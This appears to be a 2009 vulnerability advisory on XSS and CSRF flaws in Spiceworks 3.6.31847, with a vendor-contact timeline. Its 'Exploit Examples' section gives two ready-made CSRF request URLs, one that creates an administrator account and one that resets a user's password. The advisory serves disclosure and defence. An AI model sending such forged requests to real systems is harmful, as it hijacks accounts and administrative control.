nGenuity Information Services - Security Advisory Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities (XSS & CSRF) Application: Spiceworks 3.6.31847 Vendor: Spiceworks Vendor website: http://www.spiceworks.com Author: Adam Baldwin (adam_baldwin@xxxxxxxxxxxxxxx) Class: XSS, CSRF I. BACKGROUND Spiceworks is a network management, monitoring, helpdesk, etc application that uses a web based front end. II. DETAILS Multiple vulnerabilities exist within the Spiceworks platform that can be used to take over or otherwise abuse the application / infrastructure. These vulnerabilities allow for the following attack scenarios to be executed. 1. Creation of a new Administrator account 2. Password reset of users Exploit Examples: Create Administrator Account: http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Bla st_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&us er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD User Password Reset: http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD &editorId=password_entry_for_1 III. REFERENCES [1] - http://www.spiceworks.com [2] - http://cwe.mitre.org/data/definitions/79.html [3] - http://cwe.mitre.org/data/definitions/352.html IV. VENDOR COMMUNICATION 4.1.2009 - Vulnerability Discovery & Vendor Notification 4.6.2009 - Second attempt to contact vendor 4.7.2009 - Initial vendor response 8.8.2009 - Advisory Release Copyright (c) 2009 nGenuity Information Services, LLC http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/